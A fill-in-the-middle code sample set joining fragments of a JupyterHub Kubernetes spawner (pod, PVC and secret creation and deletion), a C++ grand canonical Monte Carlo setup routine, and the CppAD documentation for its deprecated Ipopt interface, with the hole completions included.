self.log.info(f"Checking for {kind}/{name}")
await asyncio.wait_for(
read(namespace=self.namespace, name=name), self.k8s_api_request_timeout
)
except asyncio.TimeoutError:
# Just try again
return False
except ApiException as e:
if e.status == 404:
self.log.info(f"{kind}/{name} is gone")
return True
self.log.exception("Error reading {kind}/{name}: {e}")
return False
# if we got here, resource still exists, try again
return False
async def _make_create_resource_request(self, kind, manifest):
"""Make an HTTP request to create the given resource
Designed to be used with exponential_backoff, so returns
True / False on success / failure
"""
create = getattr(self.api, f"create_namespaced_{kind}")
self.log.info(f"Attempting to create {kind} {manifest.metadata.name}")
try:
await asyncio.wait_for(
create(self.namespace, manifest), self.k8s_api_request_timeout
)
except asyncio.TimeoutError:
# Just try again
return False
except ApiException as e:
name = manifest.metadata.name
if e.status == 409:
self.log.info(f'Found existing {kind} {name}')
return True
# We only want to handle 409 conflict errors
self.log.exception("Failed to create %s", manifest.to_str())
raise
else:
return True
async def _start(self):
"""Start the user's pod"""
# load user options (including profile)
await self.load_user_options()
# If we have user_namespaces enabled, create the namespace.
# It's fine if it already exists.
if self.enable_user_namespaces:
await self._ensure_namespace()
# record latest event so we don't include old
# events from previous pods in self.events
# track by order and name instead of uid
# so we get events like deletion of a previously stale
# pod if it's part of this spawn process
events = self.events
if events:
self._last_event = events[-1]["metadata"]["uid"]
if self.storage_pvc_ensure:
pvc = self.get_pvc_manifest()
# If there's a timeout, just let it propagate
await exponential_backoff(
partial(
self._make_create_pvc_request, pvc, self.k8s_api_request_timeout
),
f'Could not create PVC {self.pvc_name}',
# Each req should be given k8s_api_request_timeout seconds.
timeout=self.k8s_api_request_retry_timeout,
)
# If we run into a 409 Conflict error, it means a pod with the
# same name already exists. We stop it, wait for it to stop, and
# try again. We try 4 times, and if it still fails we give up.
pod = await self.get_pod_manifest()
if self.modify_pod_hook:
pod = await gen.maybe_future(self.modify_pod_hook(self, pod))
ref_key = "{}/{}".format(self.namespace, self.pod_name)
# If there's a timeout, just let it propagate
await exponential_backoff(
partial(self._make_create_pod_request, pod, self.k8s_api_request_timeout),
f'Could not create pod {ref_key}',
timeout=self.k8s_api_request_retry_timeout,
)
if self.internal_ssl:
try:
# wait for pod to have uid,
# required for creating owner reference
await exponential_backoff(
lambda: self.pod_has_uid(
self.pod_reflector.pods.get(ref_key, None)
),
f"pod/{ref_key} does not have a uid!",
)
pod = self.pod_reflector.pods[ref_key]
owner_reference = make_owner_reference(
self.pod_name, pod["metadata"]["uid"]
)
# internal ssl, create secret object
secret_manifest = self.get_secret_manifest(owner_reference)
await exponential_backoff(
partial(
self._ensure_not_exists, "secret", secret_manifest.metadata.name
),
f"Failed to delete secret {secret_manifest.metadata.name}",
)
await exponential_backoff(
partial(
self._make_create_resource_request, "secret", secret_manifest
),
f"Failed to create secret {secret_manifest.metadata.name}",
)
service_manifest = self.get_service_manifest(owner_reference)
await exponential_backoff(
partial(
self._ensure_not_exists,
"service",
service_manifest.metadata.name,
),
f"Failed to delete service {service_manifest.metadata.name}",
)
await exponential_backoff(
partial(
self._make_create_resource_request, "service", service_manifest
),
f"Failed to create service {service_manifest.metadata.name}",
)
except Exception:
# cleanup on failure and re-raise
await self.stop(True)
raise
# we need a timeout here even though start itself has a timeout
# in order for this coroutine to finish at some point.
# using the same start_timeout here
# essentially ensures that this timeout should never propagate up
# because the handler will have stopped waiting after
# start_timeout, starting from a slightly earlier point.
try:
await exponential_backoff(
lambda: self.is_pod_running(self.pod_reflector.pods.get(ref_key, None)),
'pod %s did not start in %s seconds!' % (ref_key, self.start_timeout),
timeout=self.start_timeout,
)
except TimeoutError:
if ref_key not in self.pod_reflector.pods:
# if pod never showed up at all,
# restart the pod reflector which may have become disconnected.
self.log.error(
"Pod %s never showed up in reflector, restarting pod reflector",
ref_key,
)
self.log.error("Pods: {}".format(self.pod_reflector.pods))
self._start_watching_pods(replace=True)
raise
pod = self.pod_reflector.pods[ref_key]
self.pod_id = pod["metadata"]["uid"]
if self.event_reflector:
self.log.debug(
'pod %s events before launch: %s',
ref_key,
"\n".join(
[
"%s [%s] %s"
% (
event["lastTimestamp"] or event["eventTime"],
event["type"],
event["message"],
)
for event in self.events
]
),
)
return self._get_pod_url(pod)
async def _make_delete_pod_request(
self, pod_name, delete_options, grace_seconds, request_timeout
):
"""
Make an HTTP request to delete the given pod
Designed to be used with exponential_backoff, so returns
True / False on success / failure
"""
ref_key = "{}/{}".format(self.namespace, pod_name)
self.log.info("Deleting pod %s", ref_key)
try:
await asyncio.wait_for(
self.api.delete_namespaced_pod(
name=pod_name,
namespace=self.namespace,
body=delete_options,
grace_period_seconds=grace_seconds,
),
request_timeout,
)
return True
except asyncio.TimeoutError:
return False
except ApiException as e:
if e.status == 404:
self.log.warning(
"No pod %s to delete. Assuming already deleted.",
ref_key,
)
# If there isn't already a pod, that's ok too!
return True
else:
raise
async def _make_delete_pvc_request(self, pvc_name, request_timeout):
"""
Make an HTTP request to delete the given PVC
Designed to be used with exponential_backoff, so returns
True / False on success / failure
"""
self.log.info("Deleting pvc %s", pvc_name)
try:
await asyncio.wait_for(
self.api.delete_namespaced_persistent_volume_claim(
name=pvc_name,
namespace=self.namespace,
),
request_timeout,
)
return True
except asyncio.TimeoutError:
return False
except ApiException as e:
if e.status == 404:
self.log.warning(
"No pvc %s to delete. Assuming already deleted.",
pvc_name,
)
# If there isn't a PVC to delete, that's ok too!
return True
else:
raise
@_await_pod_reflector
async def stop(self, now=False):
delete_options = client.V1DeleteOptions()
if now:
grace_seconds = 0
else:
grace_seconds = self.delete_grace_period
delete_options.grace_period_seconds = grace_seconds
ref_key = "{}/{}".format(self.namespace, self.pod_name)
await exponential_backoff(
partial(
self._make_delete_pod_request,
self.pod_name,
delete_options,
grace_seconds,
self.k8s_api_request_timeout,
),
f'Could not delete pod {ref_key}',
timeout=self.k8s_api_request_retry_timeout,
)
try:
await exponential_backoff(
lambda: self.pod_reflector.pods.get(ref_key, None) is None,
'pod %s did not disappear in %s seconds!'
% (ref_key, self.start_timeout),
timeout=self.start_timeout,
)
except TimeoutError:
self.log.error(
"Pod %s did not disappear, restarting pod reflector", ref_key
)
self._start_watching_pods(replace=True)
raise
@default('env_keep')
def _env_keep_default(self):
return []
_profile_list = None
def _render_options_form(self, profile_list):
self._profile_list = self._init_profile_list(profile_list)
profile_form_template = Environment(loader=BaseLoader).from_string(
self.profile_form_template
)
return profile_form_template.render(profile_list=self._profile_list)
async def _render_options_form_dynamically(self, current_spawner):
profile_list = await gen.maybe_future(self.profile_list(current_spawner))
profile_list = self._init_profile_list(profile_list)
return self._render_options_form(profile_list)
@default('options_form')
def _options_form_default(self):
"""
Build the form template according to the `profile_list` setting.
Returns:
'' when no `profile_list` has been defined
The rendered template (using jinja2) when `profile_list` is defined.
"""
if not self.profile_list:
return ''
if callable(self.profile_list):
return self._render_options_form_dynamically
else:
return self._render_options_form(self.profile_list)
@default('options_from_form')
def _options_from_form_default(self):
return self._options_from_form
def _options_from_form(self, formdata):
"""get the option selected by the user on the form
This only constructs the user_options dict,
it should not actually load any options.
That is done later in `.load_user_options()`
Args:
formdata: user selection returned by the form
To access to the value, you can use the `get` accessor and the name of the html element,
for example::
formdata.get('profile',[0])
to get the value of the form named "profile", as defined in `form_template`::
<select class="form-control" name="profile"...>
</select>
Returns:
user_options (dict): the selected profile in the user_options form,
e.g. ``{"profile": "cpus-8"}``
"""
return {'profile': formdata.get('profile', [None])[0]}
async def _load_profile(self, slug):
"""Load a profile by name
Called by load_user_options
"""
# find the profile
default_profile = self._profile_list[0]
for profile in self._profile_list:
if profile.get('default', False):
# explicit default, not the first
default_profile = profile
if profile['slug'] == slug:
break
else:
if slug:
# name specified, but not found
raise ValueError(
"No such profile: %s. Options include: %s"
% (slug, ', '.join(p['slug'] for p in self._profile_list))
)
else:
# no name specified, use the default
profile = default_profile
self.log.debug(
"Applying KubeSpawner override for profile '%s'", profile['display_name']
)
kubespawner_override = profile.get('kubespawner_override', {})
for k, v in kubespawner_override.items():
if callable(v):
v = v(self)
self.log.debug(
".. overriding KubeSpawner value %s=%s (callable result)", k, v
)
else:
self.log.debug(".. overriding KubeSpawner value %s=%s", k, v)
setattr(self, k, v)
# set of recognised user option keys
# used for warning about ignoring unrecognised options
_user_option_keys = {
'profile',
}
def _init_profile_list(self, profile_list):
# generate missing slug fields from display_name
for profile in profile_list:
if 'slug' not in profile:
profile['slug'] = slugify(profile['display_name'])
return profile_list
async def load_user_options(self):
"""Load user options from self.user_options dict
This can be set via POST to the API or via options_from_form
Only supported argument by default is 'profile'.
Override in subclasses to support other options.
"""
if self._profile_list is None:
if callable(self.profile_list):
profile_list = await gen.maybe_future(self.profile_list(self))
else:
profile_list = self.profile_list
self._profile_list = self._init_profile_list(profile_list)
selected_profile = self.user_options.get('profile', None)
if self._profile_list:
await self._load_profile(selected_profile)
elif selected_profile:
self.log.warning(
"Profile %r requested, but profiles are not enabled", selected_profile
)
# help debugging by logging any option fields that are not recognized
option_keys = set(self.user_options)
unrecognized_keys = option_keys.difference(self._user_option_keys)
if unrecognized_keys:
self.log.warning(
"Ignoring unrecognized KubeSpawner user_options: %s",
", ".join(map(str, sorted(unrecognized_keys))),
)
async def _ensure_namespace(self):
ns = make_namespace(self.namespace)
api = self.api
try:
await asyncio.wait_for(
api.create_namespace(ns),
self.k8s_api_request_timeout,
)
except ApiException as e:
if e.status != 409:
# It's fine if it already exists
self.log.exception("Failed to create namespace %s", self.namespace)
raise
async def delete_forever(self):
"""Called when a user is deleted.
This can do things like request removal of resources such as persistent storage.
Only called on stopped spawners, and is likely the last action ever taken for the user.
Called on each spawner after deletion,
i.e. on named server deletion (not just stop),
and on the default Spawner when the user is being deleted.
Requires JupyterHub 1.4.1+
.. versionadded: 0.17
"""
log_name = self.user.name
if self.name:
log_name = f"{log_name}/{self.name}"
if not self.delete_pvc:
self.log.info(f"Not deleting pvc for {log_name}: {self.pvc_name}")
return
if self.name and '{servername}' not in self.pvc_name_template:
# named server has the same PVC as the default server
# don't delete the default server's PVC!
self.log.info(
f"Not deleting shared pvc for named server {log_name}: {self.pvc_name}"
)
return
await exponential_backoff(
partial(
self._make_delete_pvc_request,
self.pvc_name,
self.k8s_api_request_timeout,
),
f'Could not delete pvc {self.pvc_name}',
timeout=self.k8s_api_request_retry_timeout,
)<|fim▁end|> |
# specify default ssl alt names |
<|file_name|>gcmc.cpp<|end_file_name|><|fim▁begin|>/*--------------------------------------------
Created by Sina on 06/05/13.
Copyright (c) 2013 MIT. All rights reserved.
--------------------------------------------*/
#include "elements.h"
#include "mpi_compat.h"
#include "gcmc.h"
#include "memory.h"
#include "random.h"
#include "neighbor.h"
#include "ff_md.h"
#include "MAPP.h"
#include "atoms_md.h"
#include "comm.h"
#include "dynamic_md.h"
using namespace MAPP_NS;
/*--------------------------------------------
constructor
--------------------------------------------*/
GCMC::GCMC(AtomsMD*& __atoms,ForceFieldMD*&__ff,DynamicMD*& __dynamic,elem_type __gas_type,type0 __mu,type0 __T,int seed):
gas_type(__gas_type),
T(__T),
mu(__mu),
natms_lcl(__atoms->natms_lcl),
natms_ph(__atoms->natms_ph),
cut_sq(__ff->cut_sq),
s_lo(__atoms->comm.s_lo),
s_hi(__atoms->comm.s_hi),
dynamic(__dynamic),
world(__atoms->comm.world),
atoms(__atoms),
ff(__ff),
ielem(gas_type)
{
random=new Random(seed);
s_trials=new type0*[__dim__];
*s_trials=NULL;
del_ids=NULL;
del_ids_sz=del_ids_cpcty=0;
vars=lcl_vars=NULL;
}
/*--------------------------------------------
destructor
--------------------------------------------*/
GCMC::~GCMC()
{
delete [] del_ids;
delete [] s_trials;
delete random;
}
/*--------------------------------------------
--------------------------------------------*/
void GCMC::add_del_id(int* new_ids,int no)
{
if(del_ids_sz+no>del_ids_cpcty)
{
int* del_ids_=new int[del_ids_sz+no];
memcpy(del_ids_,del_ids,del_ids_sz*sizeof(int));
del_ids_cpcty=del_ids_sz+no;
delete [] del_ids;
del_ids=del_ids_;
}
memcpy(del_ids+del_ids_sz,new_ids,sizeof(int)*no);
del_ids_sz+=no;
}
/*--------------------------------------------
--------------------------------------------*/
int GCMC::get_new_id()
{
if(del_ids_sz)
{
del_ids_sz--;
return del_ids[del_ids_sz];
}
else
{
max_id++;
return max_id;
}
}
/*--------------------------------------------
--------------------------------------------*/
void GCMC::init()
{
cut=ff->cut[ielem][0];
for(size_t i=1;i<atoms->elements.nelems;i++)
cut=MAX(cut,ff->cut[ielem][i]);
gas_mass=atoms->elements.masses[gas_type];
kbT=atoms->kB*T;
beta=1.0/kbT;
lambda=atoms->hP/sqrt(2.0*M_PI*kbT*gas_mass);
sigma=sqrt(kbT/gas_mass);
z_fac=1.0;
for(int i=0;i<__dim__;i++) z_fac/=lambda;
z_fac*=exp(beta*mu);
vol=1.0;
for(int i=0;i<__dim__;i++)vol*=atoms->H[i][i];
id_type max_id_=0;
id_type* id=atoms->id->begin();
for(int i=0;i<natms_lcl;i++)
max_id_=MAX(id[i],max_id_);
MPI_Allreduce(&max_id_,&max_id,1,Vec<id_type>::MPI_T,MPI_MAX,world);
for(int i=0;i<del_ids_sz;i++)
max_id=MAX(max_id,del_ids[i]);
ngas_lcl=0;
elem_type* elem=atoms->elem->begin();
for(int i=0;i<natms_lcl;i++)
if(elem[i]==gas_type) ngas_lcl++;
MPI_Allreduce(&ngas_lcl,&ngas,1,MPI_INT,MPI_SUM,world);
}
/*--------------------------------------------
--------------------------------------------*/
void GCMC::fin()
{
}
/*--------------------------------------------
--------------------------------------------*/
void GCMC::box_setup()
{
int sz=0;
max_ntrial_atms=1;
for(int i=0;i<__dim__;i++)
{
type0 tmp=0.0;
for(int j=i;j<__dim__;j++)
tmp+=atoms->B[j][i]*atoms->B[j][i];
cut_s[i]=sqrt(tmp)*cut;
s_lo_ph[i]=s_lo[i]-cut_s[i];
s_hi_ph[i]=s_hi[i]+cut_s[i];
nimages_per_dim[i][0]=static_cast<int>(floor(s_hi_ph[i]));
nimages_per_dim[i][1]=-static_cast<int>(floor(s_lo_ph[i]));
max_ntrial_atms*=1+nimages_per_dim[i][0]+nimages_per_dim[i][1];
sz+=1+nimages_per_dim[i][0]+nimages_per_dim[i][1];
}
*s_trials=new type0[sz];
for(int i=1;i<__dim__;i++)
s_trials[i]=s_trials[i-1]+1+nimages_per_dim[i-1][0]+nimages_per_dim[i-1][1];
}
/*--------------------------------------------
--------------------------------------------*/
void GCMC::box_dismantle()
{
delete [] *s_trials;
*s_trials=NULL;<|fim▁hole|><|fim▁end|> | } |
<|file_name|>cppad_ipopt_nlp.hpp<|end_file_name|><|fim▁begin|>// $Id$
# ifndef CPPAD_CPPAD_IPOPT_NLP_HPP
# define CPPAD_CPPAD_IPOPT_NLP_HPP
/* --------------------------------------------------------------------------
CppAD: C++ Algorithmic Differentiation: Copyright (C) 2003-15 Bradley M. Bell
CppAD is distributed under multiple licenses. This distribution is under
the terms of the
Eclipse Public License Version 1.0.
A copy of this license is included in the COPYING file of this distribution.
Please visit http://www.coin-or.org/CppAD/ for information on other licenses.
-------------------------------------------------------------------------- */
/*
$begin cppad_ipopt_nlp$$
$dollar @$$
$spell
libipopt
namespace
dir
cppad
bool
doesn't
nan
inf
naninf
std
maxiter
infeasibility
obj
const
optimizer
cppad_ipopt_nlp.hpp
fg_info.eval
retape
CppAD
$$
$section Nonlinear Programming Using the CppAD Interface to Ipopt$$
$mindex AD$$
$head Deprecated 2012-11-28$$
This interface to Ipopt is deprecated, use $cref ipopt_solve$$ instead.
$head Syntax$$
$codei%# include "cppad_ipopt_nlp.hpp"
%$$
$codei%cppad_ipopt_solution %solution%;
%$$
$codei%cppad_ipopt_nlp %cppad_nlp%(
%n%, %m%, %x_i%, %x_l%, %x_u%, %g_l%, %g_u%, &%fg_info%, &%solution%
)%$$
$codei%
export LD_LIBRARY_PATH=@LD_LIBRARY_PATH:%ipopt_library_paths%$$
$head Purpose$$
The class $code cppad_ipopt_nlp$$ is used to solve nonlinear programming
problems of the form
$latex \[
\begin{array}{rll}
{\rm minimize} & f(x)
\\
{\rm subject \; to} & g^l \leq g(x) \leq g^u
\\
& x^l \leq x \leq x^u
\end{array}
\] $$
This is done using
$href%
http://www.coin-or.org/projects/Ipopt.xml%
Ipopt
%$$
optimizer and
$href%
http://www.coin-or.org/CppAD/%
CppAD
%$$
Algorithmic Differentiation package.
$head cppad_ipopt namespace$$
All of the declarations for these routines
are in the $code cppad_ipopt$$ namespace
(not the $code CppAD$$ namespace).
For example; $cref/SizeVector/cppad_ipopt_nlp/SizeVector/$$ below
actually denotes the type $code cppad_ipopt::SizeVector$$.
$head ipopt_library_paths$$
If you are linking to a shared version of the Ipopt library,
you may have to add some paths the $code LD_LIBRARY_PATH$$
shell variable using the $code export$$ command in the syntax above.
For example, if the file the ipopt library is
$codei%
%ipopt_prefix%/lib64/libipopt.a
%$$
you will need to add the corresponding directory; e.g.,
$codei%
export LD_LIBRARY_PATH="%ipopt_prefix%/lib64%:@LD_LIBRARY_PATH"
%$$
see $cref ipopt_prefix$$.
$head fg(x)$$
The function $latex fg : \B{R}^n \rightarrow \B{R}^{m+1}$$ is defined by
$latex \[
\begin{array}{rcl}
fg_0 (x) & = & f(x) \\
fg_1 (x) & = & g_0 (x) \\
& \vdots & \\
fg_m (x) & = & g_{m-1} (x)
\end{array}
\] $$
$subhead Index Vector$$<|fim▁hole|>for which none of the values are equal; i.e.,
it is both a vector and a set.
If $latex I$$ is an index vector $latex |I|$$ is used to denote the
number of elements in $latex I$$ and $latex \| I \|$$ is used
to denote the value of the maximum element in $latex I$$.
$subhead Projection$$
Given an index vector $latex J$$ and a positive integer $latex n$$
where $latex n > \| J \|$$, we use $latex J \otimes n $$ for
the mapping $latex ( J \otimes n ) : \B{R}^n \rightarrow \B{R}^{|J|}$$ defined by
$latex \[
[ J \otimes n ] (x)_j = x_{J(j)}
\] $$
for $latex j = 0 , \ldots |J| - 1$$.
$subhead Injection$$
Given an index vector $latex I$$ and a positive integer $latex m$$
where $latex m > \| I \|$$, we use $latex m \otimes I$$ for
the mapping $latex ( m \otimes I ): \B{R}^{|I|} \rightarrow \B{R}^m$$ defined by
$latex \[
[ m \otimes I ] (y)_i = \left\{ \begin{array}{ll}
y_k & {\rm if} \; i = I(k) \; {\rm for \; some} \;
k \in \{ 0 , \cdots, |I|-1 \}
\\
0 & {\rm otherwise}
\end{array} \right.
\] $$
$subhead Representation$$
In many applications, each of the component functions of $latex fg(x)$$
only depend on a few of the components of $latex x$$.
In this case, expressing $latex fg(x)$$ in terms of simpler functions
with fewer arguments can greatly reduce the amount of work required
to compute its derivatives.
$pre
$$
We use the functions
$latex r_k : \B{R}^{q(k)} \rightarrow \B{R}^{p(k)}$$
for $latex k = 0 , \ldots , K$$ to express our
representation of $latex fg(x)$$ in terms of simpler functions
as follows
$latex \[
fg(x) = \sum_{k=0}^{K-1} \; \sum_{\ell=0}^{L(k) - 1}
[ (m+1) \otimes I_{k,\ell} ] \; \circ
\; r_k \; \circ \; [ J_{k,\ell} \otimes n ] \; (x)
\] $$
where $latex \circ$$ represents function composition,
for $latex k = 0 , \ldots , K - 1$$, and $latex \ell = 0 , \ldots , L(k)$$,
$latex I_{k,\ell}$$ and $latex J_{k,\ell}$$ are index vectors with
$latex | J_{k,\ell} | = q(k)$$,
$latex \| J_{k,\ell} \| < n$$,
$latex | I_{k,\ell} | = p(k)$$, and
$latex \| I_{k,\ell} \| \leq m$$.
$head Simple Representation$$
In the simple representation,
$latex r_0 (x) = fg(x)$$,
$latex K = 1$$,
$latex q(0) = n$$,
$latex p(0) = m+1$$,
$latex L(0) = 1$$,
$latex I_{0,0} = (0 , \ldots , m)$$,
and $latex J_{0,0} = (0 , \ldots , n-1)$$.
$head SizeVector$$
The type $codei SizeVector$$ is defined by the
$codei cppad_ipopt_nlp.hpp$$ include file to be a
$cref SimpleVector$$ class with elements of type
$code size_t$$.
$head NumberVector$$
The type $codei NumberVector$$ is defined by the
$codei cppad_ipopt_nlp.hpp$$ include file to be a
$cref SimpleVector$$ class with elements of type
$code Ipopt::Number$$.
$head ADNumber$$
The type $codei ADNumber$$ is defined by the
$codei cppad_ipopt_nlp.hpp$$ include file to be a
an AD type that can be used to compute derivatives.
$head ADVector$$
The type $codei ADVector$$ is defined by the
$codei cppad_ipopt_nlp.hpp$$ include file to be a
$cref SimpleVector$$ class with elements of type
$code ADNumber$$.
$head n$$
The argument $icode n$$ has prototype
$codei%
size_t %n%
%$$
It specifies the dimension of the argument space;
i.e., $latex x \in \B{R}^n$$.
$head m$$
The argument $icode m$$ has prototype
$codei%
size_t %m%
%$$
It specifies the dimension of the range space for $latex g$$;
i.e., $latex g : \B{R}^n \rightarrow \B{R}^m$$.
$head x_i$$
The argument $icode x_i$$ has prototype
$codei%
const NumberVector& %x_i%
%$$
and its size is equal to $latex n$$.
It specifies the initial point where Ipopt starts the optimization process.
$head x_l$$
The argument $icode x_l$$ has prototype
$codei%
const NumberVector& %x_l%
%$$
and its size is equal to $latex n$$.
It specifies the lower limits for the argument in the optimization problem;
i.e., $latex x^l$$.
$head x_u$$
The argument $icode x_u$$ has prototype
$codei%
const NumberVector& %x_u%
%$$
and its size is equal to $latex n$$.
It specifies the upper limits for the argument in the optimization problem;
i.e., $latex x^u$$.
$head g_l$$
The argument $icode g_l$$ has prototype
$codei%
const NumberVector& %g_l%
%$$
and its size is equal to $latex m$$.
It specifies the lower limits for the constraints in the optimization problem;
i.e., $latex g^l$$.
$head g_u$$
The argument $icode g_u$$ has prototype
$codei%
const NumberVector& %g_u%
%$$
and its size is equal to $latex n$$.
It specifies the upper limits for the constraints in the optimization problem;
i.e., $latex g^u$$.
$head fg_info$$
The argument $icode fg_info$$ has prototype
$codei%
%FG_info fg_info%
%$$
where the class $icode FG_info$$ is derived from the
base class $code cppad_ipopt_fg_info$$.
Certain virtual member functions of $icode fg_info$$ are used to
compute the value of $latex fg(x)$$.
The specifications for these member functions are given below:
$subhead fg_info.number_functions$$
This member function has prototype
$codei%
virtual size_t cppad_ipopt_fg_info::number_functions(void)
%$$
If $icode K$$ has type $code size_t$$, the syntax
$codei%
%K% = %fg_info%.number_functions()
%$$
sets $icode K$$ to the number of functions used in the
representation of $latex fg(x)$$; i.e., $latex K$$ in
the $cref/representation/cppad_ipopt_nlp/fg(x)/Representation/$$ above.
$pre
$$
The $code cppad_ipopt_fg_info$$ implementation of this function
corresponds to the simple representation mentioned above; i.e.
$icode%K% = 1%$$.
$subhead fg_info.eval_r$$
This member function has the prototype
$codei%
virtual ADVector cppad_ipopt_fg_info::eval_r(size_t %k%, const ADVector& %u%) = 0;
%$$
Thus it is a pure virtual function and must be defined in the
derived class $icode FG_info$$.
$pre
$$
This function computes the value of $latex r_k (u)$$
used in the $cref/representation/cppad_ipopt_nlp/fg(x)/Representation/$$
for $latex fg(x)$$.
If $icode k$$ in $latex \{0 , \ldots , K-1 \}$$ has type $code size_t$$,
$icode u$$ is an $code ADVector$$ of size $icode q(k)$$
and $icode r$$ is an $code ADVector$$ of size $icode p(k)$$
the syntax
$codei%
%r% = %fg_info%.eval_r(%k%, %u%)
%$$
set $icode r$$ to the vector $latex r_k (u)$$.
$subhead fg_info.retape$$
This member function has the prototype
$codei%
virtual bool cppad_ipopt_fg_info::retape(size_t %k%)
%$$
If $icode k$$ in $latex \{0 , \ldots , K-1 \}$$ has type $code size_t$$,
and $icode retape$$ has type $code bool$$,
the syntax
$codei%
%retape% = %fg_info%.retape(%k%)
%$$
sets $icode retape$$ to true or false.
If $icode retape$$ is true,
$code cppad_ipopt_nlp$$ will retape the operation sequence
corresponding to $latex r_k (u)$$ for
every value of $icode u$$.
An $code cppad_ipopt_nlp$$ object
should use much less memory and run faster if $icode retape$$ is false.
You can test both the true and false cases to make sure
the operation sequence does not depend on $icode u$$.
$pre
$$
The $code cppad_ipopt_fg_info$$ implementation of this function
sets $icode retape$$ to true
(while slower it is also safer to always retape).
$subhead fg_info.domain_size$$
This member function has prototype
$codei%
virtual size_t cppad_ipopt_fg_info::domain_size(size_t %k%)
%$$
If $icode k$$ in $latex \{0 , \ldots , K-1 \}$$ has type $code size_t$$,
and $icode q$$ has type $code size_t$$, the syntax
$codei%
%q% = %fg_info%.domain_size(%k%)
%$$
sets $icode q$$ to the dimension of the domain space for $latex r_k (u)$$;
i.e., $latex q(k)$$ in
the $cref/representation/cppad_ipopt_nlp/fg(x)/Representation/$$ above.
$pre
$$
The $code cppad_ipopt_h_base$$ implementation of this function
corresponds to the simple representation mentioned above; i.e.,
$latex q = n$$.
$subhead fg_info.range_size$$
This member function has prototype
$codei%
virtual size_t cppad_ipopt_fg_info::range_size(size_t %k%)
%$$
If $icode k$$ in $latex \{0 , \ldots , K-1 \}$$ has type $code size_t$$,
and $icode p$$ has type $code size_t$$, the syntax
$codei%
%p% = %fg_info%.range_size(%k%)
%$$
sets $icode p$$ to the dimension of the range space for $latex r_k (u)$$;
i.e., $latex p(k)$$ in
the $cref/representation/cppad_ipopt_nlp/fg(x)/Representation/$$ above.
$pre
$$
The $code cppad_ipopt_h_base$$ implementation of this function
corresponds to the simple representation mentioned above; i.e.,
$latex p = m+1$$.
$subhead fg_info.number_terms$$
This member function has prototype
$codei%
virtual size_t cppad_ipopt_fg_info::number_terms(size_t %k%)
%$$
If $icode k$$ in $latex \{0 , \ldots , K-1 \}$$ has type $code size_t$$,
and $icode L$$ has type $code size_t$$, the syntax
$codei%
%L% = %fg_info%.number_terms(%k%)
%$$
sets $icode L$$ to the number of terms in representation
for this value of $icode k$$;
i.e., $latex L(k)$$ in
the $cref/representation/cppad_ipopt_nlp/fg(x)/Representation/$$ above.
$pre
$$
The $code cppad_ipopt_h_base$$ implementation of this function
corresponds to the simple representation mentioned above; i.e.,
$latex L = 1$$.
$subhead fg_info.index$$
This member function has prototype
$codei%
virtual void cppad_ipopt_fg_info::index(
size_t %k%, size_t %ell%, SizeVector& %I%, SizeVector& %J%
)
%$$
The argument
$icode%
k
%$$
has type $codei size_t$$
and is a value between zero and $latex K-1$$ inclusive.
The argument
$icode%
ell
%$$
has type $codei size_t$$
and is a value between zero and $latex L(k)-1$$ inclusive.
The argument
$icode%
I
%$$ is a $cref SimpleVector$$ with elements
of type $code size_t$$ and size greater than or equal to $latex p(k)$$.
The input value of the elements of $icode I$$ does not matter.
The output value of
the first $latex p(k)$$ elements of $icode I$$
must be the corresponding elements of $latex I_{k,ell}$$
in the $cref/representation/cppad_ipopt_nlp/fg(x)/Representation/$$ above.
The argument
$icode%
J
%$$ is a $cref SimpleVector$$ with elements
of type $code size_t$$ and size greater than or equal to $latex q(k)$$.
The input value of the elements of $icode J$$ does not matter.
The output value of
the first $latex q(k)$$ elements of $icode J$$
must be the corresponding elements of $latex J_{k,ell}$$
in the $cref/representation/cppad_ipopt_nlp/fg(x)/Representation/$$ above.
$pre
$$
The $code cppad_ipopt_h_base$$ implementation of this function
corresponds to the simple representation mentioned above; i.e.,
for $latex i = 0 , \ldots , m$$,
$icode%I%[%i%] = %i%$$,
and for $latex j = 0 , \ldots , n-1$$,
$icode%J%[%j%] = %j%$$.
$head solution$$
After the optimization process is completed, $icode solution$$ contains
the following information:
$subhead status$$
The $icode status$$ field of $icode solution$$ has prototype
$codei%
cppad_ipopt_solution::solution_status %solution%.status
%$$
It is the final Ipopt status for the optimizer.
Here is a list of the possible values for the status:
$table
$icode status$$ $cnext Meaning
$rnext
not_defined $cnext
The optimizer did not return a final status to this $code cppad_ipopt_nlp$$
object.
$rnext
unknown $cnext
The status returned by the optimizer is not defined in the Ipopt
documentation for $code finalize_solution$$.
$rnext
success $cnext
Algorithm terminated successfully at a point satisfying the convergence
tolerances (see Ipopt options).
$rnext
maxiter_exceeded $cnext
The maximum number of iterations was exceeded (see Ipopt options).
$rnext
stop_at_tiny_step $cnext
Algorithm terminated because progress was very slow.
$rnext
stop_at_acceptable_point $cnext
Algorithm stopped at a point that was converged,
not to the 'desired' tolerances, but to 'acceptable' tolerances
(see Ipopt options).
$rnext
local_infeasibility $cnext
Algorithm converged to a non-feasible point
(problem may have no solution).
$rnext
user_requested_stop $cnext
This return value should not happen.
$rnext
diverging_iterates $cnext
It the iterates are diverging.
$rnext
restoration_failure $cnext
Restoration phase failed, algorithm doesn't know how to proceed.
$rnext
error_in_step_computation $cnext
An unrecoverable error occurred while Ipopt tried to
compute the search direction.
$rnext
invalid_number_detected $cnext
Algorithm received an invalid number (such as $code nan$$ or $code inf$$)
from the users function $icode%fg_info%.eval%$$ or from the CppAD evaluations
of its derivatives
(see the Ipopt option $code check_derivatives_for_naninf$$).
$rnext
internal_error $cnext
An unknown Ipopt internal error occurred.
Contact the Ipopt authors through the mailing list.
$tend
$subhead x$$
The $code x$$ field of $icode solution$$ has prototype
$codei%
NumberVector %solution%.x
%$$
and its size is equal to $latex n$$.
It is the final $latex x$$ value for the optimizer.
$subhead z_l$$
The $code z_l$$ field of $icode solution$$ has prototype
$codei%
NumberVector %solution%.z_l
%$$
and its size is equal to $latex n$$.
It is the final Lagrange multipliers for the
lower bounds on $latex x$$.
$subhead z_u$$
The $code z_u$$ field of $icode solution$$ has prototype
$codei%
NumberVector %solution%.z_u
%$$
and its size is equal to $latex n$$.
It is the final Lagrange multipliers for the
upper bounds on $latex x$$.
$subhead g$$
The $code g$$ field of $icode solution$$ has prototype
$codei%
NumberVector %solution%.g
%$$
and its size is equal to $latex m$$.
It is the final value for the constraint function $latex g(x)$$.
$subhead lambda$$
The $code lambda$$ field of $icode solution$$ has prototype
$codei%
NumberVector %solution%.lambda
%$$
and its size is equal to $latex m$$.
It is the final value for the
Lagrange multipliers corresponding to the constraint function.
$subhead obj_value$$
The $code obj_value$$ field of $icode solution$$ has prototype
$codei%
